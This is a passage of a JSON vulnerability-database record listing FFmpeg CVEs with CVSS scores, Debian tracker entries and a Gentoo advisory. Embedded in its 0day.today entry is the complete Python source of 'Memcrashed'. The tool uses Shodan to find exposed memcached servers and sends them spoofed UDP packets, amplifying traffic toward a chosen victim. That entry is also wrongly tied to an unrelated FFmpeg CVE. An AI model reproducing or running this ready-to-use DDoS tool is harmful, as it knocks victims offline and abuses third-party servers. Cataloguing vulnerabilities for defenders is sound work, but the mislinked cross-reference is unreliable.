"CVE-2018-9841", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9841"], "modified": "2020-03-30T17:15:00", "cpe": ["cpe:/a:ffmpeg:ffmpeg:3.4.2"], "id": "CVE-2018-9841", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9841", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ffmpeg:ffmpeg:3.4.2:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2022-04-24T07:38:07", "description": "In FFmpeg 4.1.3, there is a division by zero at adx_write_trailer in libavformat/rawenc.c.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-07-07T22:15:00", "type": "debiancve", "title": "CVE-2019-13390", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13390"], "modified": "2019-07-07T22:15:00", "id": "DEBIANCVE:CVE-2019-13390", "href": "https://security-tracker.debian.org/tracker/CVE-2019-13390", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "block_cmp() in libavcodec/zmbvenc.c in FFmpeg 4.1.3 has a heap-based buffer over-read.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-07-05T01:15:00", "type": "debiancve", "title": "CVE-2019-13312", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13312"], "modified": "2019-07-05T01:15:00", "id": "DEBIANCVE:CVE-2019-13312", "href": "https://security-tracker.debian.org/tracker/CVE-2019-13312", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "aa_read_header in libavformat/aadec.c in FFmpeg before 3.2.14 and 4.x before 4.1.4 does not check for sscanf failure and consequently allows use of uninitialized variables.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-04T14:29:00", "type": "debiancve", "title": "CVE-2019-12730", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12730"], "modified": "2019-06-04T14:29:00", "id": "DEBIANCVE:CVE-2019-12730", "href": "https://security-tracker.debian.org/tracker/CVE-2019-12730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "FFmpeg before 4.2 has a heap-based buffer overflow in vqa_decode_chunk because of an out-of-array access in vqa_decode_init in libavcodec/vqavideo.c.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-14T02:15:00", "type": "debiancve", "title": "CVE-2019-17542", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17542"], "modified": "2019-10-14T02:15:00", "id": "DEBIANCVE:CVE-2019-17542", "href": "https://security-tracker.debian.org/tracker/CVE-2019-17542", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "In FFmpeg before 4.2, avcodec_open2 in libavcodec/utils.c allows a NULL pointer dereference and possibly unspecified other impact when there is no valid close function pointer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-14T02:15:00", "type": "debiancve", "title": "CVE-2019-17539", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17539"], "modified": "2019-10-14T02:15:00", "id": "DEBIANCVE:CVE-2019-17539", "href": "https://security-tracker.debian.org/tracker/CVE-2019-17539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "The decode_init function in libavcodec/utvideodec.c in FFmpeg 2.8 through 3.4.2 allows remote attackers to cause a denial of service (Out of array read) via an AVI file with crafted dimensions within chroma subsampling data.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-02-28T07:29:00", "type": "debiancve", "title": "CVE-2018-7557", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7557"], "modified": "2018-02-28T07:29:00", "id": "DEBIANCVE:CVE-2018-7557", "href": "https://security-tracker.debian.org/tracker/CVE-2018-7557", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "The decode_plane function in libavcodec/utvideodec.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (out of array read) via a crafted AVI file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-02-12T02:29:00", "type": "debiancve", "title": "CVE-2018-6912", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6912"], "modified": "2018-02-12T02:29:00", "id": "DEBIANCVE:CVE-2018-6912", "href": "https://security-tracker.debian.org/tracker/CVE-2018-6912", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "The decode_init function in libavcodec/utvideodec.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (out of array read) via an AVI file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-04-11T03:29:00", "type": "debiancve", "title": "CVE-2018-10001", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10001"], "modified": "2018-04-11T03:29:00", "id": "DEBIANCVE:CVE-2018-10001", "href": "https://security-tracker.debian.org/tracker/CVE-2018-10001", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "The svg_probe function in libavformat/img2dec.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (Infinite Loop) via a crafted XML file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-04-24T06:29:00", "type": "debiancve", "title": "CVE-2018-7751", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7751"], "modified": "2018-04-24T06:29:00", "id": "DEBIANCVE:CVE-2018-7751", "href": "https://security-tracker.debian.org/tracker/CVE-2018-7751", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-24T07:38:07", "description": "The export function in libavfilter/vf_signature.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (out-of-array access) or possibly have unspecified other impact via a long filename.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-07T07:29:00", "type": "debiancve", "title": "CVE-2018-9841", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9841"], "modified": "2018-04-07T07:29:00", "id": "DEBIANCVE:CVE-2018-9841", "href": "https://security-tracker.debian.org/tracker/CVE-2018-9841", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2021-05-01T17:03:05", "description": "\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Gentoo Linux: CVE-2019-17542: FFmpeg: Multiple vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17542"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/GENTOO-LINUX-CVE-2019-17542/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-04T21:31:02", "description": "Exploit for linux platform in category dos / poc", "cvss3": {}, "published": "2018-03-09T00:00:00", "type": "zdt", "title": "Memcached 1.5.5 - Memcrashed Insufficient Control of Network Message Volume Denial of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-10001"], "modified": "2018-03-09T00:00:00", "id": "1337DAY-ID-29970", "href": "https://0day.today/exploit/description/29970", "sourceData": "Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API\r\n\r\n#-- coding: utf8 --\r\n#!/usr/bin/python\r\n# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44265.zip\r\n \r\nimport sys, os, time, shodan\r\nfrom pathlib import Path\r\nfrom scapy.all import *\r\nfrom contextlib import contextmanager\r\n \r\nstarttime=time.time()\r\n \r\n@contextmanager\r\ndef suppress_stdout():\r\n with open(os.devnull, \"w\") as devnull:\r\n old_stdout = sys.stdout\r\n sys.stdout = devnull\r\n try: \r\n yield\r\n finally:\r\n sys.stdout = old_stdout\r\n \r\nclass color:\r\n HEADER = '\\033[0m'\r\n \r\nkeys = Path(\"./api.txt\")\r\nlogo = color.HEADER + '''\r\n \r\n \u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \r\n \u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\r\n \u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551\r\n \u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551\r\n \u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\r\n \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \r\n \r\n Author: @037\r\n Version: 3.1\r\n \r\n####################################### DISCLAIMER ########################################\r\n| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable |\r\n| memcached servers. It then allows you to use the same servers to launch widespread |\r\n| distributed denial of service attacks by forging UDP packets sourced to your victim. |\r\n| Default payload includes the memcached \"stats\" command, 10 bytes to send, but the reply |\r\n| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |\r\n| I am NOT responsible for any damages caused or any crimes committed by using this tool. |\r\n###########################################################################################\r\n \r\n'''\r\nprint(logo)\r\n \r\nif keys.is_file():\r\n with open('api.txt', 'r') as file:\r\n SHODAN_API_KEY=file.readlines()\r\nelse:\r\n file = open('api.txt', 'w')\r\n SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ')\r\n file.write(SHODAN_API_KEY)\r\n print('[~] File written: ./api.txt')\r\n file.close()\r\n \r\nwhile True:\r\n api = shodan.Shodan(SHODAN_API_KEY)\r\n print('')\r\n try:\r\n myresults = Path(\"./bots.txt\")\r\n query = input(\"[*] Use Shodan API to search for affected Memcached servers? <Y/n>: \").lower()\r\n if query.startswith('y'):\r\n print('')\r\n print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)\r\n results = api.search('product:\"Memcached\" port:11211')\r\n print('[\u2713] API Key Authentication: SUCCESS')\r\n print('[~] Number of bots: %s' % results['total'])\r\n print('')\r\n saveresult = input(\"[*] Save results for later usage? <Y/n>: \").lower()\r\n if saveresult.startswith('y'):\r\n file2 = open('bots.txt', 'a')\r\n for result in results['matches']:\r\n file2.write(result['ip_str'] + \"\\n\")\r\n print('[~] File written: ./bots.txt')\r\n print('')\r\n file2.close()\r\n saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower()\r\n if myresults.is_file():\r\n if saveme.startswith('y'):\r\n ip_arrayn = []\r\n with open('bots.txt') as my_file:\r\n for line in my_file:\r\n ip_arrayn.append(line)\r\n ip_array = [s.rstrip() for s in ip_arrayn]\r\n else:\r\n print('')\r\n print('[\u2718] Error: No bots stored locally, bots.txt file not found!')\r\n print('')\r\n if saveme.startswith('y') or query.startswith('y'):\r\n print('')\r\n target = input(\"[\u25b8] Enter target IP address: \")\r\n power = int(input(\"[\u25b8] Enter preferred power (Default 1): \") or \"1\")\r\n data = input(\"[\u25b8] Enter payload contained inside packet: \") or \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00stats\\r\\n\"\r\n print('')\r\n if query.startswith('y'):\r\n iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower()\r\n if iplist.startswith('y'):\r\n print('')\r\n counter= int(0)\r\n for result in results['matches']:\r\n host = api.host('%s' % result['ip_str'])\r\n counter=counter+1\r\n print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))\r\n time.sleep(2.0 - ((time.time() - starttime) % 2.0))\r\n if saveme.startswith('y'):\r\n iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower()\r\n if iplistlocal.startswith('y'):\r\n print('')\r\n counter= int(0)\r\n for x in ip_array:\r\n host = api.host('%s' % x)\r\n counter=counter+1\r\n print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))\r\n time.sleep(2.0 - ((time.time() - starttime) % 2.0))\r\n print('')\r\n engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()\r\n if engage.startswith('y'):\r\n if saveme.startswith('y'):\r\n for i in ip_array:\r\n if power>1:\r\n print('[+] Sending %d forged UDP packets to: %s' % (power, i))\r\n with suppress_stdout():\r\n send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)\r\n elif power==1:\r\n print('[+] Sending 1 forged UDP packet to: %s' % i)\r\n with suppress_stdout():\r\n send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)\r\n else:\r\n for result in results['matches']:\r\n if power>1:\r\n print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))\r\n with suppress_stdout():\r\n send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)\r\n elif power==1:\r\n print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])\r\n with suppress_stdout():\r\n send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)\r\n print('')\r\n print('[\u2022] Task complete! Exiting Platform. Have a wonderful day.')\r\n break\r\n else:\r\n print('')\r\n print('[\u2718] Error: %s not engaged!' % target)\r\n print('[~] Restarting Platform! Please wait.')\r\n print('')\r\n else:\r\n print('')\r\n print('[\u2718] Error: No bots stored locally or remotely on Shodan!')\r\n print('[~] Restarting Platform! Please wait.')\r\n print('')\r\n \r\n except shodan.APIError as e:\r\n print('[\u2718] Error: %s' % e)\r\n option = input('[*] Would you like to change API Key? <Y/n>: ').lower()\r\n if option.startswith('y'):\r\n file = open('api.txt', 'w')\r\n SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ')\r\n file.write(SHODAN_API_KEY)\r\n print('[~] File written: ./api.txt')\r\n file.close()\r\n print('[~] Restarting Platform! Please wait.')\r\n print('')\r\n else:\r\n print('')\r\n print('[\u2022] Exiting Platform. Have a wonderful day.')\r\n break\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/29970", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2022-01-17T19:01:44", "description": "### Background\n\nFFmpeg is a complete, cross-platform solution to record, convert and stream audio and video. \n\n### Description\n\nMultiple vulnerabilities have been discovered in FFmpeg. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll FFmpeg users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-video/ffmpeg-4.2.4\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-28T00:00:00", "type": "gentoo", "title": "FFmpeg: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 